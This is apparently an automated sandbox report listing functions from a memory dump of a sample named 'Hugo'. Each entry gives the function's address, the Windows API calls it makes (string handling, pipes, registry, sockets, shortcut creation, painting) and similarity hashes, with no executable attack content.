Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: a788eab1c5e55849ccfa24cff9300bbaf4c70ef0067b386fef677335b99bf938
Instruction ID: d88367b29664dd36a6ae06fb6d61870ca3fac22cd9ed10b3ccbdb01a91f83e2e
Opcode Fuzzy Hash: a788eab1c5e55849ccfa24cff9300bbaf4c70ef0067b386fef677335b99bf938
Instruction Fuzzy Hash: 71219772600219AF9F10DFA8CC88DBB77ACEB093607448426F909DB2A0DB74DC479761

Function 00F78164 Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00F781A9
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00F781CF
SysAllocString.OLEAUT32(00000000), ref: 00F781D2
SysAllocString.OLEAUT32 ref: 00F781F3
SysFreeString.OLEAUT32 ref: 00F781FC
StringFromGUID2.OLE32(?,?,00000028), ref: 00F78216
SysAllocString.OLEAUT32(?), ref: 00F78224

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 898ef0a192616eda0a5a60c4c2a2e8919565e7c0d544d76862ee40c67849ef49
Instruction ID: b2c476e855e21b9128e9eaee200c171f6b42e3b830268afb07217d64605ffb85
Opcode Fuzzy Hash: 898ef0a192616eda0a5a60c4c2a2e8919565e7c0d544d76862ee40c67849ef49
Instruction Fuzzy Hash: 3C218871600108BF9B10DFB8DC89DAA77ECEB09370704C126F905CB1A1DA74EC42E765

Function 00F80E79 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 00F80E99
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00F80ED5

Strings

nul, xrefs: 00F80F0E

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: 6967b203e3eb400bb9fea8f0fd83c9b35f52365c885d5e128e52f10e3bb7bfaf
Instruction ID: c6b45a272f3baa13a8b130b38ad348a1dd51c0bfa48f2cb09db891e9af0118dc
Opcode Fuzzy Hash: 6967b203e3eb400bb9fea8f0fd83c9b35f52365c885d5e128e52f10e3bb7bfaf
Instruction Fuzzy Hash: 99216D7190030AABDB60AF24DC05ADA77E8FF55720F608A59FDA5E72E0DB709844EB50

Function 00F80F4E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00F80F6D
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00F80FA8

Strings

nul, xrefs: 00F80FE0

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: 02efc425d66ffac79b76366df05f507ba3d3deca95ccd421d3c582be45dd479f
Instruction ID: 2a48535ee47f7bb2b35063d8230f2040768ac20dda66f694b6adcde79d4c6667
Opcode Fuzzy Hash: 02efc425d66ffac79b76366df05f507ba3d3deca95ccd421d3c582be45dd479f
Instruction Fuzzy Hash: D2216071A003499BEB20AF689C04ADA77E8FF55730F204B19F9A1D72D0DB709885EB50

Function 00FA4B4B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00F17873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00F178B1
Part of subcall function 00F17873: GetStockObject.GDI32(00000011), ref: 00F178C5
Part of subcall function 00F17873: SendMessageW.USER32(00000000,00000030,00000000), ref: 00F178CF

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00FA4BB0
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00FA4BBD
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00FA4BC8
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00FA4BD7
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00FA4BE3

Strings

Msctls_Progress32, xrefs: 00FA4B81

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: d2f512bbe93f798370dc9f6b8bdbd9a0e3dcd4c9cbb018fd85979db625f936c5
Instruction ID: 2798cf014c7cf83944e79c2d4a2dbb22f43eb0635ecfd397f89d67183b8182cc
Opcode Fuzzy Hash: d2f512bbe93f798370dc9f6b8bdbd9a0e3dcd4c9cbb018fd85979db625f936c5
Instruction Fuzzy Hash: D61193B254021DBEEF119EA4CC85EEB7F6DEF497A8F014111B618A6090CA75DC21ABB0

Function 00F4DB5F Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00F4DB23: _free.LIBCMT ref: 00F4DB4C

_free.LIBCMT ref: 00F4DBAD

Part of subcall function 00F42D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00F4DB51,00FE1DC4,00000000,00FE1DC4,00000000,?,00F4DB78,00FE1DC4,00000007,00FE1DC4,?,00F4DF75,00FE1DC4), ref: 00F42D4E
Part of subcall function 00F42D38: GetLastError.KERNEL32(00FE1DC4,?,00F4DB51,00FE1DC4,00000000,00FE1DC4,00000000,?,00F4DB78,00FE1DC4,00000007,00FE1DC4,?,00F4DF75,00FE1DC4,00FE1DC4), ref: 00F42D60

_free.LIBCMT ref: 00F4DBB8
_free.LIBCMT ref: 00F4DBC3
_free.LIBCMT ref: 00F4DC17
_free.LIBCMT ref: 00F4DC22
_free.LIBCMT ref: 00F4DC2D
_free.LIBCMT ref: 00F4DC38

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 98b13fc91f4fe31fecb0273d364a71dd69e1171f55120a532e903f65f4669862
Instruction ID: ee7bc34691ba95bdd7f09e8e1ad8270eed00e5ccf654a628b82a16d38e388f82
Opcode Fuzzy Hash: 98b13fc91f4fe31fecb0273d364a71dd69e1171f55120a532e903f65f4669862
Instruction Fuzzy Hash: FC114272941704A6D920BB70CC4BFCBBFEC9F44700F410C29BA99AA152D77DB5046651

Function 00F7E30E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00F7E328
LoadStringW.USER32(00000000), ref: 00F7E32F
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00F7E345
LoadStringW.USER32(00000000), ref: 00F7E34C
MessageBoxW.USER32(00000000,?,?,00011010), ref: 00F7E390

Strings

%s (%d) : ==> %s: %s %s, xrefs: 00F7E36D

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: HandleLoadModuleString$Message
String ID: %s (%d) : ==> %s: %s %s
API String ID: 4072794657-3128320259
Opcode ID: 251410ed8b1ebfe90fbbd33c1076a8f264ef5117a36ee4716f8e425fbef994ac
Instruction ID: a9b7e7d4a9090d2c4cd34cbfb8a509c24c0cc8a85f8c8a35bc6f314a753e553e
Opcode Fuzzy Hash: 251410ed8b1ebfe90fbbd33c1076a8f264ef5117a36ee4716f8e425fbef994ac
Instruction Fuzzy Hash: 9E0186F290020C7FE751ABA4CD89EEB776CDB0D300F408592B74AE6541E6749E846B71

Function 00F81312 Relevance: 10.5, APIs: 7, Instructions: 35synchronizationthreadCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,?), ref: 00F81322
EnterCriticalSection.KERNEL32(00000000,?), ref: 00F81334
TerminateThread.KERNEL32(00000000,000001F6), ref: 00F81342
WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00F81350
CloseHandle.KERNEL32(00000000), ref: 00F8135F
InterlockedExchange.KERNEL32(?,000001F6), ref: 00F8136F
LeaveCriticalSection.KERNEL32(00000000), ref: 00F81376

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: 796e0a7049f5059faaba0d1d2292b924cc4bc1aa36bd2280647a170cc82ceae3
Instruction ID: 7abce57a16d41f165099ff1f5057623c9834266158a896c556a84af500a7ec4e
Opcode Fuzzy Hash: 796e0a7049f5059faaba0d1d2292b924cc4bc1aa36bd2280647a170cc82ceae3
Instruction Fuzzy Hash: 22F0EC72442616BBD7412F54EE49BD6BB79FF46312F401121F10291CA08B749475EF90

Function 00F926BD Relevance: 9.3, APIs: 6, Instructions: 298networkCOMMON

Download Yara Rule

APIs

__WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00F9281D
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00F9283E
WSAGetLastError.WSOCK32 ref: 00F9284F
htons.WSOCK32(?,?,?,?,?), ref: 00F92938
inet_ntoa.WSOCK32(?), ref: 00F928E9

Part of subcall function 00F7433E: _strlen.LIBCMT ref: 00F74348

Part of subcall function 00F93C81: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,00F8F669), ref: 00F93C9D

_strlen.LIBCMT ref: 00F92992

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
String ID:
API String ID: 3203458085-0
Opcode ID: 9ec637315e87695b5e61eab57632c6473072355c2d3644743dcce2d9bb6b7dfe
Instruction ID: 1e00e28854d0242deb388a869cfc3557a38d3a3673c539794dba665a8c944c3f
Opcode Fuzzy Hash: 9ec637315e87695b5e61eab57632c6473072355c2d3644743dcce2d9bb6b7dfe
Instruction Fuzzy Hash: 99B1F435604300AFE724DF24CC85F6A7BE5AF84328F54854CF45A5B2A2DB35ED81EB92

Function 00F40527 Relevance: 9.3, APIs: 6, Instructions: 269COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 00F4042A
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F40446
__allrem.LIBCMT ref: 00F4045D
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F4047B
__allrem.LIBCMT ref: 00F40492
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F404B0

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
String ID:
API String ID: 1992179935-0
Opcode ID: f879b393e65d4db2631db90962c4ab5633f4520d067d5efed2ccc62c0ef88ee5
Instruction ID: aece46debe585deabe595ded36cfc1444c92094a0cb0b8796740993ca28040d8
Opcode Fuzzy Hash: f879b393e65d4db2631db90962c4ab5633f4520d067d5efed2ccc62c0ef88ee5
Instruction Fuzzy Hash: 2C81CA72A007059BE720EE69CC41B6A7FA9AF45334F24412AFF11DB691EF74D900A794

Function 00F46571 Relevance: 9.2, APIs: 6, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00F38649,00F38649,?,?,?,00F467C2,00000001,00000001,8BE85006), ref: 00F465CB
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00F467C2,00000001,00000001,8BE85006,?,?,?), ref: 00F46651
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00F4674B
__freea.LIBCMT ref: 00F46758

Part of subcall function 00F43B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00F36A79,?,0000015D,?,?,?,?,00F385B0,000000FF,00000000,?,?), ref: 00F43BC5

__freea.LIBCMT ref: 00F46761
__freea.LIBCMT ref: 00F46786

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: 29bc1a79a1bc6b667e1a752c98c6825525418de257ef8d9edfe8edfc2e15f16b
Instruction ID: ad5b76106b17151038098e058633e8c6b8db63fe2b195260cacf9d4a67d1ce90
Opcode Fuzzy Hash: 29bc1a79a1bc6b667e1a752c98c6825525418de257ef8d9edfe8edfc2e15f16b
Instruction Fuzzy Hash: 3B51D272A00206AFEB258F64CC85EAF7FAAEF42764F154669FD04D6140EF34DC50A6A1

Function 00F9C63B Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00F1B329: _wcslen.LIBCMT ref: 00F1B333

Part of subcall function 00F9D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F9C10E,?,?), ref: 00F9D415
Part of subcall function 00F9D3F8: _wcslen.LIBCMT ref: 00F9D451
Part of subcall function 00F9D3F8: _wcslen.LIBCMT ref: 00F9D4C8
Part of subcall function 00F9D3F8: _wcslen.LIBCMT ref: 00F9D4FE

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F9C72A
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00F9C785
RegCloseKey.ADVAPI32(00000000), ref: 00F9C7CA
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00F9C7F9
RegCloseKey.ADVAPI32(?,?,00000000), ref: 00F9C853
RegCloseKey.ADVAPI32(?), ref: 00F9C85F

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
String ID:
API String ID: 1120388591-0
Opcode ID: 8db849728df03bc1e713357d75b790188f252f339e595b709df02cb521ea3767
Instruction ID: 98c9fc4b86d534aaad752a98b353c4fa655d0b0b8c350327f42f8d2958cd7e92
Opcode Fuzzy Hash: 8db849728df03bc1e713357d75b790188f252f339e595b709df02cb521ea3767
Instruction Fuzzy Hash: 3D81D271508241EFDB14DF64C881E6ABBE5FF84318F04845CF0954B2A2CB31ED45EB92

Function 00F7009D Relevance: 9.2, APIs: 6, Instructions: 183memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000035), ref: 00F700A9
SysAllocString.OLEAUT32(00000000), ref: 00F70150
VariantCopy.OLEAUT32(00F70354,00000000), ref: 00F70179
VariantClear.OLEAUT32(00F70354), ref: 00F7019D
VariantCopy.OLEAUT32(00F70354,00000000), ref: 00F701A1
VariantClear.OLEAUT32(?), ref: 00F701AB

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: Variant$ClearCopy$AllocInitString
String ID:
API String ID: 3859894641-0
Opcode ID: 38956f4f50d809b0e1d11456f100188fb1f689db39aae15c1b63701e38bcfb6f
Instruction ID: 0a0ddc95085ca65433326f471b98dc365edaad624b0aaa22f0c5f1b2fe202d08
Opcode Fuzzy Hash: 38956f4f50d809b0e1d11456f100188fb1f689db39aae15c1b63701e38bcfb6f
Instruction Fuzzy Hash: 8D51A572550310EACF10AB64D899B69B3A5AF45320F14D447E80EEF297DE749C40EB97

Function 00F89B51 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 383COMMON

Download Yara Rule

APIs

Part of subcall function 00F141EA: _wcslen.LIBCMT ref: 00F141EF

Part of subcall function 00F18577: _wcslen.LIBCMT ref: 00F1858A

GetOpenFileNameW.COMDLG32(00000058), ref: 00F89F2A
_wcslen.LIBCMT ref: 00F89F4B
_wcslen.LIBCMT ref: 00F89F72
GetSaveFileNameW.COMDLG32(00000058), ref: 00F89FCA

Strings

X, xrefs: 00F89E57

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: _wcslen$FileName$OpenSave
String ID: X
API String ID: 83654149-3081909835
Opcode ID: d4e94c88f8486b234f4cbed4e6f7b0a59cef33c7ca7be109b4d07821a78889b6
Instruction ID: e482ddc52a2dd2d3715aa76f8e5ebcee17a847e509280d8a98ee70315e8512b0
Opcode Fuzzy Hash: d4e94c88f8486b234f4cbed4e6f7b0a59cef33c7ca7be109b4d07821a78889b6
Instruction Fuzzy Hash: ADE1A331A08341DFD714EF24C881AAAB7E0FF85314F04856DF8899B2A2DB75DD45EB92

Function 00F86ED3 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 367comCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00F86F21
CoInitialize.OLE32(00000000), ref: 00F8707E
CoCreateInstance.OLE32(00FB0CC4,00000000,00000001,00FB0B34,?), ref: 00F87095
CoUninitialize.OLE32 ref: 00F87319

Strings

.lnk, xrefs: 00F86EFF, 00F86F69, 00F87025

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_wcslen
String ID: .lnk
API String ID: 886957087-24824748
Opcode ID: ff8e29f94130bb83146ef5bf07ffe0f4c6e5dced9e57cf1af50aaa51d2d7ca60
Instruction ID: 8b16d303af0526e72c19104fb98cc6dbd097ba30b0cc87cfe6d38e7aa3da9118
Opcode Fuzzy Hash: ff8e29f94130bb83146ef5bf07ffe0f4c6e5dced9e57cf1af50aaa51d2d7ca60
Instruction Fuzzy Hash: 5BD16871608301AFC304EF24C881AABB7E8FF98744F50496DF5858B2A2DB35E945DB92

Function 00F11B00 Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 00F1249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00F124B0

BeginPaint.USER32(?,?,?), ref: 00F11B35
GetWindowRect.USER32(?,?), ref: 00F11B99
ScreenToClient.USER32(?,?), ref: 00F11BB6
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00F11BC7
EndPaint.USER32(?,?,?,?,?), ref: 00F11C15
Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00F53287

Part of subcall function 00F11C2D: BeginPath.GDI32(00000000), ref: 00F11C4B

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
String ID:
API String ID: 3050599898-0
